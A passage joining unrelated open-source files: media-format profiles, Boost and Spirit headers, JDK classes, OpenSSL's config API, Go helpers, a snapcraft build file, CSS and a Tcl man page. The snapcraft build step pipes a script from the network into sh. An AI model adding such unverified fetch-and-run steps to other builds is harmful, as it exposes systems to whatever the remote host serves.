a:aac-lc|he-aac|mp3 m:video/x-flv b:60000000 w:3840 h:2160 Supported = f:flv v:mp4 a:aac-lc|he-aac|mp3 m:video/x-flv b:20000000 w:1920 h:1080 Supported = f:flv v:h263|vp6 a:aac-lc|he-aac|mp3 m:video/x-flv b:20000000 w:1920 h:1080 Supported = f:mkv v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:60000000 w:4096 h:2160 Supported = f:mkv v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:60000000 w:3840 h:2160 Supported = f:mkv v:mp4|vc1 
a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:20000000 w:1920 h:1080 Supported = f:mkv v:h265 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:80000000 w:4096 h:2160 Supported = f:mkv v:mpeg1|mpeg2 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:20000000 w:1920 h:1080 Supported = f:mkv v:vp6|wmv a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/x-mkv b:20000000 w:1920 h:1080 Supported = f:mkv v:h264 a:vorbis m:video/x-mkv n:2 b:60000000 w:3840 h:2160 Supported = f:mkv v:h264 a:vorbis m:video/x-mkv n:2 b:60000000 w:4096 h:2160 Supported = f:mkv v:mp4|vc1 a:vorbis m:video/x-mkv n:2 b:20000000 w:1920 h:1080 Supported = f:mkv v:h265 a:vorbis m:video/x-mkv n:2 b:80000000 w:4096 h:2160 Supported = f:mkv v:mpeg1|mpeg2 a:vorbis m:video/x-mkv n:2 b:20000000 w:1920 h:1080 Supported = f:mkv v:h263|vp6|wmv a:vorbis m:video/x-mkv n:2 b:20000000 w:1920 h:1080 Supported = f:mov v:h263|vp6|wmv a:aac-lc|he-aac|ac3|eac3|lpcm|mp3|mpa|wma m:video/quicktime b:20000000 w:1920 h:1080 Supported = f:mp4 v:h265 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3 m:video/mp4 b:80000000 w:4096 h:2160 Supported = f:mp4 v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3 m:video/mp4 b:60000000 w:4096 h:2160 Supported = f:mp4 v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3 m:video/mp4 b:60000000 w:3840 h:2160 Supported = f:mpegps v:mpeg1|mpeg2 a:aac-lc|he-aac|ac3|lpcm|mp3|mpa m:video/mpeg b:20000000 w:1920 h:1080 Supported = f:mpegts v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:60000000 w:4096 h:2160 Supported = f:mpegts v:h264 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:60000000 w:3840 h:2160 Supported = f:mpegts v:mp4 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:20000000 w:1920 h:1080 Supported = f:mpegts v:h265 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:80000000 w:4096 h:2160 Supported = f:mpegts v:mpeg2 a:aac-lc|he-aac|ac3|dts|dtshd|eac3|lpcm|mp3|mpa|wma m:video/vnd.dlna.mpeg-tts b:20000000 w:1920 h:1080 Supported = f:rm a:cook m:video/vnd.rn-realvideo b:20000000 w:1920 h:1080 Supported = f:webm v:vp8 a:vorbis m:video/webm n:2 b:20000000 w:1920 h:1080 Supported = f:webm v:vp9 a:vorbis m:video/webm n:2 b:40000000 w:4096 h:2160 Supported = f:wmv|asf v:mp4|vc1|vp6|wmv a:wma|wma10|wmapro m:video/x-ms-wmv b:20000000 w:1920 h:1080 # Supported audio formats: Supported = f:aiff m:audio/L16 Supported = f:ape Supported = f:flac n:2 Supported = f:m4a a:(?!alac) Supported = f:m4a a:alac m:audio/x-m4a Supported = f:mp3 Supported = f:oga a:vorbis n:2 Supported = f:wma Supported = f:wav # Supported subtitles formats: SupportedExternalSubtitlesFormats = MICRODVD,SAMI,SUBRIP,TEXT SupportedInternalSubtitlesFormats = ASS,DIVX,SUBRIP,VOBSUB
{ "pile_set_name": "Github" }
// Copyright Neil Groves 2009. Use, modification and // distribution is subject to the Boost Software License, Version // 1.0. (See accompanying file LICENSE_1_0.txt or copy at // http://www.boost.org/LICENSE_1_0.txt) // // // For more information, see http://www.boost.org/libs/range/ // #ifndef BOOST_RANGE_ALGORITHM_REMOVE_COPY_IF_HPP_INCLUDED #define BOOST_RANGE_ALGORITHM_REMOVE_COPY_IF_HPP_INCLUDED #include <boost/concept_check.hpp> #include <boost/range/begin.hpp> #include <boost/range/end.hpp> #include <boost/range/concepts.hpp> #include <algorithm> namespace boost { /// \brief template function remove_copy_if /// /// range-based version of the remove_copy_if std algorithm /// /// \pre SinglePassRange is a model of the SinglePassRangeConcept /// \pre OutputIterator is a model of the OutputIteratorConcept /// \pre Predicate is a model of the PredicateConcept /// \pre InputIterator's value type is convertible to Predicate's argument type /// \pre out_it is not an iterator in the range rng template< class SinglePassRange, class OutputIterator, class Predicate > inline OutputIterator remove_copy_if(const SinglePassRange& rng, OutputIterator out_it, Predicate pred) { BOOST_RANGE_CONCEPT_ASSERT(( SinglePassRangeConcept<const SinglePassRange> )); return std::remove_copy_if(boost::begin(rng), boost::end(rng), out_it, pred); } } #endif // include guard
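// A minimal usage sketch of the range-based remove_copy_if declared above
// (not part of the Boost sources; the values and output iterator are
// illustrative only). It copies every element for which the predicate is
// false, so this prints "1 3 5 ":
#include <boost/range/algorithm/remove_copy_if.hpp>
#include <iostream>
#include <iterator>
#include <vector>

int main()
{
    const std::vector<int> v = { 1, 2, 3, 4, 5, 6 };
    // Skip the even values while copying to stdout.
    boost::remove_copy_if(v, std::ostream_iterator<int>(std::cout, " "),
                          [](int x) { return x % 2 == 0; });
}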
{ "pile_set_name": "Github" }
/*============================================================================= Copyright (c) 2001-2011 Joel de Guzman Copyright (c) 2001-2011 Hartmut Kaiser http://spirit.sourceforge.net/ Distributed under the Boost Software License, Version 1.0. (See accompanying file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt) =============================================================================*/ #ifndef BOOST_SPIRIT_INCLUDE_QI_LIT #define BOOST_SPIRIT_INCLUDE_QI_LIT #if defined(_MSC_VER) #pragma once #endif #include <boost/spirit/home/qi/string/lit.hpp> #endif
{ "pile_set_name": "Github" }
/* * Copyright (c) 2003, Oracle and/or its affiliates. All rights reserved. * DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER. * * This code is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License version 2 only, as * published by the Free Software Foundation. Oracle designates this * particular file as subject to the "Classpath" exception as provided * by Oracle in the LICENSE file that accompanied this code. * * This code is distributed in the hope that it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License * version 2 for more details (a copy is included in the LICENSE file that * accompanied this code). * * You should have received a copy of the GNU General Public License version * 2 along with this work; if not, write to the Free Software Foundation, * Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. * * Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA * or visit www.oracle.com if you need additional information or have any * questions. */ package sun.management; /** */ @Deprecated public class CompilerThreadStat implements java.io.Serializable { private String name; private long taskCount; private long compileTime; private MethodInfo lastMethod; CompilerThreadStat(String name, long taskCount, long time, MethodInfo lastMethod) { this.name = name; this.taskCount = taskCount; this.compileTime = time; this.lastMethod = lastMethod; }; /** * Returns the name of the compiler thread associated with * this compiler thread statistic. * * @return the name of the compiler thread. */ public String getName() { return name; } /** * Returns the number of compile tasks performed by the compiler thread * associated with this compiler thread statistic. * * @return the number of compile tasks performed by the compiler thread. */ public long getCompileTaskCount() { return taskCount; } /** * Returns the accumulated elapsed time spent by the compiler thread * associated with this compiler thread statistic. * * @return the accumulated elapsed time spent by the compiler thread. */ public long getCompileTime() { return compileTime; } /** * Returns the information about the last method compiled by * the compiler thread associated with this compiler thread statistic. * * @return a {@link MethodInfo} object for the last method * compiled by the compiler thread. */ public MethodInfo getLastCompiledMethodInfo() { return lastMethod; } public String toString() { return getName() + " compileTasks = " + getCompileTaskCount() + " compileTime = " + getCompileTime(); } private static final long serialVersionUID = 6992337162326171013L; }
{ "pile_set_name": "Github" }
/* * reserved comment block * DO NOT REMOVE OR ALTER! */ /* * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.sun.org.apache.bcel.internal.generic; /** * SASTORE - Store into short array * <PRE>Stack: ..., arrayref, index, value -&gt; ...</PRE> * * @version $Id$ */ public class SASTORE extends ArrayInstruction implements StackConsumer { public SASTORE() { super(com.sun.org.apache.bcel.internal.Const.SASTORE); } /** * Call corresponding visitor method(s). The order is: * Call visitor methods of implemented interfaces first, then * call methods according to the class hierarchy in descending order, * i.e., the most specific visitXXX() call comes last. * * @param v Visitor object */ @Override public void accept( final Visitor v ) { v.visitStackConsumer(this); v.visitExceptionThrower(this); v.visitTypedInstruction(this); v.visitArrayInstruction(this); v.visitSASTORE(this); } }
{ "pile_set_name": "Github" }
commandlinefu_id: 4276
translator:
weibo: ''
hide: true
command: |-
  mencoder infile.wmv -ofps 23.976 -ovc lavc -oac copy -o outfile.avi
summary: |-
  Convert wmv into avi
{ "pile_set_name": "Github" }
/* conf_api.c */ /* Copyright (C) 1995-1998 Eric Young ([email protected]) * All rights reserved. * * This package is an SSL implementation written * by Eric Young ([email protected]). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson ([email protected]). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young ([email protected])" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson ([email protected])" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] 
*/ /* Part of the code in here was originally in conf.c, which is now removed */ #ifndef CONF_DEBUG # undef NDEBUG /* avoid conflicting definitions */ # define NDEBUG #endif #include <assert.h> #include <stdlib.h> #include <string.h> #include <openssl/conf.h> #include <openssl/conf_api.h> #include "e_os.h" static void value_free_hash_doall_arg(CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf); static void value_free_stack_doall(CONF_VALUE *a); static IMPLEMENT_LHASH_DOALL_ARG_FN(value_free_hash, CONF_VALUE, LHASH_OF(CONF_VALUE)) static IMPLEMENT_LHASH_DOALL_FN(value_free_stack, CONF_VALUE) /* Up until OpenSSL 0.9.5a, this was get_section */ CONF_VALUE *_CONF_get_section(const CONF *conf, const char *section) { CONF_VALUE *v, vv; if ((conf == NULL) || (section == NULL)) return (NULL); vv.name = NULL; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); return (v); } /* Up until OpenSSL 0.9.5a, this was CONF_get_section */ STACK_OF(CONF_VALUE) *_CONF_get_section_values(const CONF *conf, const char *section) { CONF_VALUE *v; v = _CONF_get_section(conf, section); if (v != NULL) return ((STACK_OF(CONF_VALUE) *)v->value); else return (NULL); } int _CONF_add_string(CONF *conf, CONF_VALUE *section, CONF_VALUE *value) { CONF_VALUE *v = NULL; STACK_OF(CONF_VALUE) *ts; ts = (STACK_OF(CONF_VALUE) *)section->value; value->section = section->section; if (!sk_CONF_VALUE_push(ts, value)) { return 0; } v = lh_CONF_VALUE_insert(conf->data, value); if (v != NULL) { (void)sk_CONF_VALUE_delete_ptr(ts, v); OPENSSL_free(v->name); OPENSSL_free(v->value); OPENSSL_free(v); } return 1; } char *_CONF_get_string(const CONF *conf, const char *section, const char *name) { CONF_VALUE *v, vv; char *p; if (name == NULL) return (NULL); if (conf != NULL) { if (section != NULL) { vv.name = (char *)name; vv.section = (char *)section; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); if (strcmp(section, "ENV") == 0) { p = getenv(name); if (p != NULL) return (p); } } vv.section = "default"; vv.name = (char *)name; v = lh_CONF_VALUE_retrieve(conf->data, &vv); if (v != NULL) return (v->value); else return (NULL); } else return (getenv(name)); } #if 0 /* There's no way to provide error checking * with this function, so force implementors * of the higher levels to get a string and * read the number themselves. */ long _CONF_get_number(CONF *conf, char *section, char *name) { char *str; long ret = 0; str = _CONF_get_string(conf, section, name); if (str == NULL) return (0); for (;;) { if (conf->meth->is_number(conf, *str)) ret = ret * 10 + conf->meth->to_int(conf, *str); else return (ret); str++; } } #endif static unsigned long conf_value_hash(const CONF_VALUE *v) { return (lh_strhash(v->section) << 2) ^ lh_strhash(v->name); } static IMPLEMENT_LHASH_HASH_FN(conf_value, CONF_VALUE) static int conf_value_cmp(const CONF_VALUE *a, const CONF_VALUE *b) { int i; if (a->section != b->section) { i = strcmp(a->section, b->section); if (i) return (i); } if ((a->name != NULL) && (b->name != NULL)) { i = strcmp(a->name, b->name); return (i); } else if (a->name == b->name) return (0); else return ((a->name == NULL) ? 
-1 : 1); } static IMPLEMENT_LHASH_COMP_FN(conf_value, CONF_VALUE) int _CONF_new_data(CONF *conf) { if (conf == NULL) { return 0; } if (conf->data == NULL) if ((conf->data = lh_CONF_VALUE_new()) == NULL) { return 0; } return 1; } void _CONF_free_data(CONF *conf) { if (conf == NULL || conf->data == NULL) return; lh_CONF_VALUE_down_load(conf->data) = 0; /* evil thing to make * sure the * 'OPENSSL_free()' works as * * expected */ lh_CONF_VALUE_doall_arg(conf->data, LHASH_DOALL_ARG_FN(value_free_hash), LHASH_OF(CONF_VALUE), conf->data); /* * We now have only 'section' entries in the hash table. Due to problems * with */ lh_CONF_VALUE_doall(conf->data, LHASH_DOALL_FN(value_free_stack)); lh_CONF_VALUE_free(conf->data); } static void value_free_hash_doall_arg(CONF_VALUE *a, LHASH_OF(CONF_VALUE) *conf) { if (a->name != NULL) (void)lh_CONF_VALUE_delete(conf, a); } static void value_free_stack_doall(CONF_VALUE *a) { CONF_VALUE *vv; STACK_OF(CONF_VALUE) *sk; int i; if (a->name != NULL) return; sk = (STACK_OF(CONF_VALUE) *)a->value; for (i = sk_CONF_VALUE_num(sk) - 1; i >= 0; i--) { vv = sk_CONF_VALUE_value(sk, i); OPENSSL_free(vv->value); OPENSSL_free(vv->name); OPENSSL_free(vv); } if (sk != NULL) sk_CONF_VALUE_free(sk); OPENSSL_free(a->section); OPENSSL_free(a); } /* Up until OpenSSL 0.9.5a, this was new_section */ CONF_VALUE *_CONF_new_section(CONF *conf, const char *section) { STACK_OF(CONF_VALUE) *sk = NULL; int ok = 0, i; CONF_VALUE *v = NULL, *vv; if ((sk = sk_CONF_VALUE_new_null()) == NULL) goto err; if ((v = OPENSSL_malloc(sizeof(CONF_VALUE))) == NULL) goto err; i = strlen(section) + 1; if ((v->section = OPENSSL_malloc(i)) == NULL) goto err; memcpy(v->section, section, i); v->name = NULL; v->value = (char *)sk; vv = lh_CONF_VALUE_insert(conf->data, v); OPENSSL_assert(vv == NULL); ok = 1; err: if (!ok) { if (sk != NULL) sk_CONF_VALUE_free(sk); if (v != NULL) OPENSSL_free(v); v = NULL; } return (v); } IMPLEMENT_STACK_OF(CONF_VALUE)
{ "pile_set_name": "Github" }
/* Package to provides helpers to ease working with pointer values of marshalled structures. */ package to // Copyright 2017 Microsoft Corporation // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // String returns a string value for the passed string pointer. It returns the empty string if the // pointer is nil. func String(s *string) string { if s != nil { return *s } return "" } // StringPtr returns a pointer to the passed string. func StringPtr(s string) *string { return &s } // StringSlice returns a string slice value for the passed string slice pointer. It returns a nil // slice if the pointer is nil. func StringSlice(s *[]string) []string { if s != nil { return *s } return nil } // StringSlicePtr returns a pointer to the passed string slice. func StringSlicePtr(s []string) *[]string { return &s } // StringMap returns a map of strings built from the map of string pointers. The empty string is // used for nil pointers. func StringMap(msp map[string]*string) map[string]string { ms := make(map[string]string, len(msp)) for k, sp := range msp { if sp != nil { ms[k] = *sp } else { ms[k] = "" } } return ms } // StringMapPtr returns a pointer to a map of string pointers built from the passed map of strings. func StringMapPtr(ms map[string]string) *map[string]*string { msp := make(map[string]*string, len(ms)) for k, s := range ms { msp[k] = StringPtr(s) } return &msp } // Bool returns a bool value for the passed bool pointer. It returns false if the pointer is nil. func Bool(b *bool) bool { if b != nil { return *b } return false } // BoolPtr returns a pointer to the passed bool. func BoolPtr(b bool) *bool { return &b } // Int returns an int value for the passed int pointer. It returns 0 if the pointer is nil. func Int(i *int) int { if i != nil { return *i } return 0 } // IntPtr returns a pointer to the passed int. func IntPtr(i int) *int { return &i } // Int32 returns an int value for the passed int pointer. It returns 0 if the pointer is nil. func Int32(i *int32) int32 { if i != nil { return *i } return 0 } // Int32Ptr returns a pointer to the passed int32. func Int32Ptr(i int32) *int32 { return &i } // Int64 returns an int value for the passed int pointer. It returns 0 if the pointer is nil. func Int64(i *int64) int64 { if i != nil { return *i } return 0 } // Int64Ptr returns a pointer to the passed int64. func Int64Ptr(i int64) *int64 { return &i } // Float32 returns an int value for the passed int pointer. It returns 0.0 if the pointer is nil. func Float32(i *float32) float32 { if i != nil { return *i } return 0.0 } // Float32Ptr returns a pointer to the passed float32. func Float32Ptr(i float32) *float32 { return &i } // Float64 returns an int value for the passed int pointer. It returns 0.0 if the pointer is nil. func Float64(i *float64) float64 { if i != nil { return *i } return 0.0 } // Float64Ptr returns a pointer to the passed float64. func Float64Ptr(i float64) *float64 { return &i }
{ "pile_set_name": "Github" }
name: deadd-notification-center
confinement: strict
base: core18
summary: Linux Notification Center
adopt-info: deadd-notification-center
description: |
  A haskell-written notification center for users that like a desktop with style...

slots:
  dbus-daemon:
    interface: dbus
    bus: session
    name: org.freedesktop.Notifications

apps:
  deadd-notification-center:
    command: usr/bin/deadd-notification-center
    extensions: [gnome-3-28]
    slots:
      - dbus-daemon

parts:
  deadd-notification-center:
    plugin: make
    source: https://github.com/phuhl/linux_notification_center.git
    build-packages:
      - libtool
      - libcairo2-dev
      - libpango1.0-dev
      - libgirepository1.0-dev
      - libgtk-3-dev
      - libxml2-dev
    stage-packages:
      - curl
    build-environment:
      - PATH: "/root/.local/bin/$PATH"
    override-build: |
      mkdir -p /root/parts/deadd-notification-center/install/usr/share/locale/en/LC_MESSAGES
      mkdir -p /root/parts/deadd-notification-center/install/usr/share/locale/de/LC_MESSAGES
      curl -SSL https://get.haskellstack.org | sh -s - -f
      which stack
      snapcraftctl build
    override-pull: |
      snapcraftctl pull
      version="$(git describe --always --tags | sed -e 's/-/+git/;y/-/./')"
      [ -n "$(echo $version | grep "+git")" ] && grade=devel || grade=stable
      snapcraftctl set-version "$version"
      snapcraftctl set-grade "$grade"
      echo "Version: ${version}"
      echo "Grade: ${grade}"
{ "pile_set_name": "Github" }
/* * (c) Copyright IBM Corp 2002, 2006 */ package javax.xml.namespace; import java.io.*; /** * <code>QName</code> class represents the value of a qualified name * as specified in <a href="http://www.w3.org/TR/xmlschema-2/#QName">XML * Schema Part2: Datatypes specification</a>. * <p> * The value of a QName contains a <b>namespaceURI</b> and a <b>localPart</b>. * The localPart provides the local part of the qualified name. The * namespaceURI is a URI reference identifying the namespace. * * Note: Some of this impl code was taken from Axis. * * @author axis-dev * @author Matthew J. Duftler ([email protected]) */ public class QName implements Serializable { // Comment/shared empty string. private static final String emptyString = ""; // Field namespaceURI. private String namespaceURI; // Field localPart. private String localPart; // Field prefix. private String prefix; private static final long serialVersionUID = -9120448754896609940L; /** * Constructor for the QName. * * @param localPart Local part of the QName */ public QName(String localPart) { this.namespaceURI = emptyString; this.localPart = (localPart == null) ? emptyString : localPart.intern(); this.prefix = emptyString; } /** * Constructor for the QName. * * @param namespaceURI Namespace URI for the QName * @param localPart Local part of the QName. */ public QName(String namespaceURI, String localPart) { this.namespaceURI = (namespaceURI == null) ? emptyString : namespaceURI.intern(); this.localPart = (localPart == null) ? emptyString : localPart.intern(); this.prefix = emptyString; } /** * Constructor for the QName. * * @param namespaceURI Namespace URI for the QName * @param localPart Local part of the QName. * @param prefix the xmlns-declared prefix for this namespaceURI */ public QName(String namespaceURI, String localPart, String prefix) { this.namespaceURI = (namespaceURI == null) ? emptyString : namespaceURI.intern(); this.localPart = (localPart == null) ? emptyString : localPart.intern(); this.prefix = (prefix == null) ? emptyString : prefix.intern(); } /** * Gets the Namespace URI for this QName * * @return Namespace URI */ public String getNamespaceURI() { return namespaceURI; } /** * Gets the Local part for this QName * * @return Local part */ public String getLocalPart() { return localPart; } /** * Gets the prefix for this QName * * @return prefix of this QName */ public String getPrefix() { return prefix; } /** * Returns a string representation of this QName * * @return a string representation of the QName */ public String toString() { return ((namespaceURI == emptyString) ? localPart : '{' + namespaceURI + '}' + localPart); } /** * Tests this QName for equality with another object. * <p> * If the given object is not a QName or is null then this method * returns <tt>false</tt>. * <p> * For two QNames to be considered equal requires that both * localPart and namespaceURI must be equal. This method uses * <code>String.equals</code> to check equality of localPart * and namespaceURI. Any class that extends QName is required * to satisfy this equality contract. * <p> * This method satisfies the general contract of the <code>Object.equals</code> method. * * @param obj the reference object with which to compare * * @return <code>true</code> if the given object is identical to this * QName: <code>false</code> otherwise. 
*/ public final boolean equals(Object obj) { if (obj == this) { return true; } if (!(obj instanceof QName)) { return false; } if ((namespaceURI == ((QName)obj).namespaceURI) && (localPart == ((QName)obj).localPart)) { return true; } return false; } /** * Returns a QName holding the value of the specified String. * <p> * The string must be in the form returned by the QName.toString() * method, i.e. "{namespaceURI}localPart", with the "{namespaceURI}" * part being optional. * <p> * This method doesn't do a full validation of the resulting QName. * In particular, it doesn't check that the resulting namespace URI * is a legal URI (per RFC 2396 and RFC 2732), nor that the resulting * local part is a legal NCName per the XML Namespaces specification. * * @param s the string to be parsed * @throws java.lang.IllegalArgumentException If the specified String * cannot be parsed as a QName * @return QName corresponding to the given String */ public static QName valueOf(String s) { if ((s == null) || s.equals("")) { throw new IllegalArgumentException("Invalid QName literal."); } if (s.charAt(0) == '{') { int i = s.indexOf('}'); if (i == -1) { throw new IllegalArgumentException("Invalid QName literal."); } if (i == s.length() - 1) { throw new IllegalArgumentException("Invalid QName literal."); } else { return new QName(s.substring(1, i), s.substring(i + 1)); } } else { return new QName(s); } } /** * Returns a hash code value for this QName object. The hash code * is based on both the localPart and namespaceURI parts of the * QName. This method satisfies the general contract of the * <code>Object.hashCode</code> method. * * @return a hash code value for this Qname object */ public final int hashCode() { return namespaceURI.hashCode() ^ localPart.hashCode(); } private void readObject(ObjectInputStream in) throws IOException, ClassNotFoundException { in.defaultReadObject(); namespaceURI = namespaceURI.intern(); localPart = localPart.intern(); if(prefix == null) { //The serialized object did not have a 'prefix'. //i.e. it was serialized from an old version of QName. prefix = emptyString; } else { prefix = prefix.intern(); } } }
{ "pile_set_name": "Github" }
/**
 * This file has no copyright assigned and is placed in the Public Domain.
 * This file is part of the mingw-w64 runtime package.
 * No warranty is given; refer to the file DISCLAIMER.PD within this package.
 */
long double fabsl (long double x);

long double fabsl (long double x)
{
#if defined(__x86_64__) || defined(_AMD64_) || defined(__i386__) || defined(_X86_)
  long double res = 0.0L;
  asm volatile ("fabs;" : "=t" (res) : "0" (x));
  return res;
#elif defined(__arm__) || defined(_ARM_) || defined(__aarch64__) || defined(_ARM64_)
  return __builtin_fabsl (x);
#endif /* defined(__x86_64__) || defined(_AMD64_) || defined(__i386__) || defined(_X86_) */
}
{ "pile_set_name": "Github" }
/*
 * Common
 */
.share {
  padding: 20rpx 10rpx;
}

.share .title {
  border-left: 3px solid #ff6a80;
  margin-left: 10rpx;
  padding-left: 20rpx;
  font-size: 32rpx;
  font-weight: 500;
}

.share .desc {
  font-size: 32rpx;
  padding: 0 10rpx 20rpx 10rpx;
  margin-top: 20rpx;
}

.share .content {
  padding: 20rpx;
}

.share .submit {
  margin: 20rpx 0;
  padding: 0 20rpx;
}

.share button {
  height: 70rpx;
  line-height: 70rpx;
}

.submit-double button {
  width: 48%;
}

/*
 * Link
 */
.url .content {
  font-size: 32rpx;
  color: #ff6a80;
}
{ "pile_set_name": "Github" }
'\" '\" Copyright (c) 2005 Andreas Kupries <[email protected]> '\" '\" See the file "license.terms" for information on usage and redistribution '\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\" .TH Tcl_SetChannelError 3 8.5 Tcl "Tcl Library Procedures" .so man.macros .BS '\" Note: do not modify the .SH NAME line immediately below! .SH NAME Tcl_SetChannelError, Tcl_SetChannelErrorInterp, Tcl_GetChannelError, Tcl_GetChannelErrorInterp \- functions to create/intercept Tcl errors by channel drivers. .SH SYNOPSIS .nf \fB#include <tcl.h>\fR .sp void \fBTcl_SetChannelError\fR(\fIchan, msg\fR) .sp void \fBTcl_SetChannelErrorInterp\fR(\fIinterp, msg\fR) .sp void \fBTcl_GetChannelError\fR(\fIchan, msgPtr\fR) .sp void \fBTcl_GetChannelErrorInterp\fR(\fIinterp, msgPtr\fR) .sp .SH ARGUMENTS .AS Tcl_Channel chan .AP Tcl_Channel chan in Refers to the Tcl channel whose bypass area is accessed. .AP Tcl_Interp* interp in Refers to the Tcl interpreter whose bypass area is accessed. .AP Tcl_Obj* msg in Error message put into a bypass area. A list of return options and values, followed by a string message. Both message and the option/value information are optional. .AP Tcl_Obj** msgPtr out Reference to a place where the message stored in the accessed bypass area can be stored in. .BE .SH DESCRIPTION .PP The current definition of a Tcl channel driver does not permit the direct return of arbitrary error messages, except for the setting and retrieval of channel options. All other functions are restricted to POSIX error codes. .PP The functions described here overcome this limitation. Channel drivers are allowed to use \fBTcl_SetChannelError\fR and \fBTcl_SetChannelErrorInterp\fR to place arbitrary error messages in \fBbypass areas\fR defined for channels and interpreters. And the generic I/O layer uses \fBTcl_GetChannelError\fR and \fBTcl_GetChannelErrorInterp\fR to look for messages in the bypass areas and arrange for their return as errors. The POSIX error codes set by a driver are used now if and only if no messages are present. .PP \fBTcl_SetChannelError\fR stores error information in the bypass area of the specified channel. The number of references to the \fBmsg\fR value goes up by one. Previously stored information will be discarded, by releasing the reference held by the channel. The channel reference must not be NULL. .PP \fBTcl_SetChannelErrorInterp\fR stores error information in the bypass area of the specified interpreter. The number of references to the \fBmsg\fR value goes up by one. Previously stored information will be discarded, by releasing the reference held by the interpreter. The interpreter reference must not be NULL. .PP \fBTcl_GetChannelError\fR places either the error message held in the bypass area of the specified channel into \fImsgPtr\fR, or NULL; and resets the bypass, that is, after an invocation all following invocations will return NULL, until an intervening invocation of \fBTcl_SetChannelError\fR with a non-NULL message. The \fImsgPtr\fR must not be NULL. The reference count of the message is not touched. The reference previously held by the channel is now held by the caller of the function and it is its responsibility to release that reference when it is done with the value. 
